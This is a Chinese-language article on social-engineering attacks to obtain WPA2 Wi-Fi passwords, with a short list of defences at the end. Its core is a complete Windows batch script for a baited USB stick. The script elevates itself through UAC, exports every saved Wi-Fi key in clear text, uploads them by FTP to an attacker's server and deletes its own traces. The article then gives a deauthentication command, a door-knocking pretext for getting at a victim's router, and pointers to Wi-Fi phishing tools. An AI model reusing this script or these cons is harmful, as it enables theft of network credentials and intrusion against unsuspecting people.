06.08 常見社工破解WPA2密碼方法及防範措施

0×00前言

何為社工?社工是一種通過利用受害者心理弱點,如本能反應、好奇心、同情心、信任、貪婪等進行諸如欺騙、盜取、控制等非法手段的一種攻擊方式。在無線安全中也可以利用社工做到許多非法操作。下面舉幾個利用社工盜取wpa2密碼的例子:

0×01 移動存儲攻擊

某寶小容量u盤,在u盤中存放一個bat批處理文件,並命名為誘使人點開的標題,如:windows電腦優化、私人照片等等。其實bat文件的內容是這個:

@echo off
>nul 2>&1 "%SYSTEMROOT%\\system32\\cacls.exe" "%SYSTEMROOT%\\system32\\config\\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\\getadmin.vbs"
"%temp%\\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\\getadmin.vbs" ( del "%temp%\\getadmin.vbs" )
md c:\\win
netsh wlan export profile key=clear folder=c:\\win
echo open 服務器ip>C:\\config.txt
echo user 賬號>>C:\\config.txt
echo 密碼>>C:\\config.txt
echo mput c:\\win\\*.xml>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt

echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo yes>>C:\\config.txt
echo bye>>C:\\config.txt

ftp -n -s:"C:\\config.txt"
del C:\\config.txt
del C:\\win\\*.xml
del %0

這個bat腳本會讀取本機連接過的wifi信息(包括密碼)打包到一個文件夾裡並全部put到服務器上,然後刪除痕跡和自身防止服務器信息洩露。最後攻擊者就可以在自己的ftp服務器裡挑選自己中意的wifi了。

攻擊演示:

打開此腳本

常見社工破解WPA2密碼方法及防範措施

彈出cmd界面,1秒後消失(太快了不好截),bat腳本也隨之消失

查看ftp服務器

常見社工破解WPA2密碼方法及防範措施

wifi信息已經put上來了

進入服務器打開一個xml文件

常見社工破解WPA2密碼方法及防範措施

就拿到了密碼

可以自己在裡面添加功能使社工效果更好,例如腳本名稱命名為某某公司有獎問卷調查,並添加打開調查問卷的命令,使攻擊神不知鬼不覺。

若攻擊者將腳本拷入多個U盤後廣泛撒網,就可以獲得該城市的大量wifi信息,影響極大。

0×02 直接接觸受害者

1.使用Deauthentication攻擊

aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

在下班休息的時候(這個時候普遍在使用網絡)對受害者使用斷網攻擊,等一小時後去敲門,詢問網絡是否故障,詢問網絡是哪家公司配置的,然後聲稱自己的網絡也故障了,是一樣的公司,然後詢問報修電話並撥打,其實撥打的是其他人或根本沒有撥打,然後假裝是保修人員提示讓自己重啟路由器,攻擊者就可以接觸到受害者路由器,運氣好的話路由器背面有pin碼,就可以撤退了。如果沒有,攻擊者就進一步施壓,假裝被保修人員提示打開路由器管理界面在管理界面重啟路由器,乘機看到密碼。重啟完畢後手機ssh連接kali停止攻擊,造成重啟成功修復網絡的假象,然後撤退。

2.結合移動存儲攻擊,配合badusb,謊稱有重要文件需要發送然而手機沒電了,家裡人還沒下班。第一天進公司不想留下壞印象,從而直接接觸受害者電腦,插入badusb,執行bat腳本或木馬

3.謊稱自己是某某公司或某某大學的,正在進行網民安全意識的問卷調查,並將其中帶有提問wifi密碼的問卷遞交受害者,從而獲得wifi密碼

0×03 wifi釣魚

利用fluxion、wifiphisher等工具實施釣魚攻擊:

https://github.com/FluxionNetwork/fluxion

https://github.com/sophron/wifiphisher ——項目地址

它們的大概原理是抓取受害者客戶端與wifi的握手包,對目標客戶端實施wifi拒絕服務攻擊,發送大量解離包,然後偽造一個相同名稱的ap,受害者連接偽造的ap後會被解析到這個頁面:

常見社工破解WPA2密碼方法及防範措施

受害者輸入密碼後會自動與抓取的握手包進行比對,若正確,則停止拒絕服務攻擊。網上有很多wifi釣魚的教程,這裡就不再闡述。

0×04 防禦措施

1.綁定mac地址,設置白名單,只允許自己的機器連接wifi

2.隱藏wifi廣播,避免自己成為目標

3.不要插入來路不明的u盤,不要打開來路不明的程序,不要連接來路不明的無線信號

4.儘量不讓陌生人接觸到自己的設備

5.wifi最好使用wpa2加密,並使密碼複雜度越高越好,儘量別在密碼裡使用和自己有關的信息

6.定期更換路由器管理界面密碼和wifi密碼

7.最好關閉路由器上的wps功能

8.儘量不使用wifi萬能鑰匙等類似軟件


分享到:


相關文章: